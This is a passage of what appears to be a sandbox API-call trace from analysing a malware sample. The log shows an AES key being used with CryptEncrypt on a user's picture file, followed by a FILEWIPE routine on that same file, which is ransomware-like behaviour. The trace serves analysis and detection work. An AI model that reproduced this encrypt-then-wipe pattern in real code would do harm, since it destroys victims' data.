returned 0x9c26b8 [0188.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.897] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.897] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0188.898] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.898] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0188.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.898] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.898] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.899] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.899] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.899] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.899] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0188.900] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.900] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0188.901] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0188.901] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0188.901] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.901] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.901] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.902] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.902] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0188.902] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0188.902] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0188.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0188.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.903] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0188.904] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.904] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.904] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0188.904] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.904] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.904] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0188.904] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.905] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x80da, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x80e0) returned 1 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0188.905] CharLowerBuffW (in: lpsz="byte[32993]", cchLength=0xb | out: lpsz="byte[32993]") returned 0xb [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0188.905] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0188.906] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0188.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0188.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.907] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.908] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc022d0*, pdwDataLen=0x87e820*=0x80da, dwBufLen=0x80e0 | out: pbData=0xc022d0*, pdwDataLen=0x87e820*=0x80e0) returned 1 [0188.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0188.908] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.911] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.920] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0188.920] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.921] CryptDestroyKey (hKey=0x90aed8) returned 1 [0188.921] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.921] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.921] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.921] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.922] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0188.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.922] FreeLibrary (hLibModule=0x74f20000) returned 1 [0188.942] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0188.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x1dee4310, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 0x90ae18 [0188.943] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.943] CharLowerBuffW (in: lpsz="byte[32986]", 